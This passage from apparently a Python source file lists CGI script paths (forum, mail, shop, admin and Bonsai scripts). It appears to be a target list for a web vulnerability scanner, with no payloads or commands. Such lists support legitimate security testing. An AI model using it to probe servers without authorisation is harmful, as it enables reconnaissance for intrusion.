r"/dcadmin.cgi",
|
|
||||||
r"/dcboard.cgi",
|
|
||||||
r"/dcforum.cgi",
|
|
||||||
r"/dcforum/dcforum.cgi",
|
|
||||||
r"/debuff.cgi",
|
|
||||||
r"/debug.cgi",
|
|
||||||
r"/details.cgi",
|
|
||||||
r"/edittag/edittag.cgi",
|
|
||||||
r"/emumail.cgi",
|
|
||||||
r"/enter_buff.cgi",
|
|
||||||
r"/enter_bug.cgi",
|
|
||||||
r"/ez2000/ezadmin.cgi",
|
|
||||||
r"/ez2000/ezboard.cgi",
|
|
||||||
r"/ez2000/ezman.cgi",
|
|
||||||
r"/fcgi-bin/echo",
|
|
||||||
r"/fcgi-bin/echo",
|
|
||||||
r"/fcgi-bin/echo2",
|
|
||||||
r"/fcgi-bin/echo2",
|
|
||||||
r"/Gozila.cgi",
|
|
||||||
r"/hitmatic/analyse.cgi",
|
|
||||||
r"/hp_docs/cgi-bin/index.cgi",
|
|
||||||
r"/html/cgi-bin/cgicso",
|
|
||||||
r"/html/cgi-bin/cgicso",
|
|
||||||
r"/index.cgi",
|
|
||||||
r"/info.cgi",
|
|
||||||
r"/infosrch.cgi",
|
|
||||||
r"/login.cgi",
|
|
||||||
r"/mailview.cgi",
|
|
||||||
r"/main.cgi",
|
|
||||||
r"/megabook/admin.cgi",
|
|
||||||
r"/ministats/admin.cgi",
|
|
||||||
r"/mods/apage/apage.cgi",
|
|
||||||
r"/_mt/mt.cgi",
|
|
||||||
r"/musicqueue.cgi",
|
|
||||||
r"/ncbook.cgi",
|
|
||||||
r"/newpro.cgi",
|
|
||||||
r"/newsletter.sh",
|
|
||||||
r"/oem_webstage/cgi-bin/oemapp_cgi",
|
|
||||||
r"/page.cgi",
|
|
||||||
r"/parse_xml.cgi",
|
|
||||||
r"/photodata/manage.cgi",
|
|
||||||
r"/photo/manage.cgi",
|
|
||||||
r"/print.cgi",
|
|
||||||
r"/process_buff.cgi",
|
|
||||||
r"/process_bug.cgi",
|
|
||||||
r"/pub/english.cgi",
|
|
||||||
r"/quikmail/nph-emumail.cgi",
|
|
||||||
r"/quikstore.cgi",
|
|
||||||
r"/reviews/newpro.cgi",
|
|
||||||
r"/ROADS/cgi-bin/search.pl",
|
|
||||||
r"/sample01.cgi",
|
|
||||||
r"/sample02.cgi",
|
|
||||||
r"/sample03.cgi",
|
|
||||||
r"/sample04.cgi",
|
|
||||||
r"/sampleposteddata.cgi",
|
|
||||||
r"/scancfg.cgi",
|
|
||||||
r"/scancfg.cgi",
|
|
||||||
r"/servers/link.cgi",
|
|
||||||
r"/setpasswd.cgi",
|
|
||||||
r"/SetSecurity.shm",
|
|
||||||
r"/shop/member_html.cgi",
|
|
||||||
r"/shop/normal_html.cgi",
|
|
||||||
r"/site_searcher.cgi",
|
|
||||||
r"/siteUserMod.cgi",
|
|
||||||
r"/submit.cgi",
|
|
||||||
r"/technote/print.cgi",
|
|
||||||
r"/template.cgi",
|
|
||||||
r"/test.cgi",
|
|
||||||
r"/ucsm/isSamInstalled.cgi",
|
|
||||||
r"/upload.cgi",
|
|
||||||
r"/userreg.cgi",
|
|
||||||
r"/users/scripts/submit.cgi",
|
|
||||||
r"/vood/cgi-bin/vood_view.cgi",
|
|
||||||
r"/Web_Store/web_store.cgi",
|
|
||||||
r"/webtools/bonsai/ccvsblame.cgi",
|
|
||||||
r"/webtools/bonsai/cvsblame.cgi",
|
|
||||||
r"/webtools/bonsai/cvslog.cgi",
|
|
||||||
r"/webtools/bonsai/cvsquery.cgi",
|
|
||||||
r"/webtools/bonsai/cvsqueryform.cgi",
|
|
||||||
r"/webtools/bonsai/showcheckins.cgi",
|
|
||||||
r"/wwwadmin.cgi",
|
|
||||||
r"/wwwboard.cgi",
|
|
||||||
r"/wwwboard/wwwboard.cgi",
|
|
||||||
)
|
|
Loading…
Reference in New Issue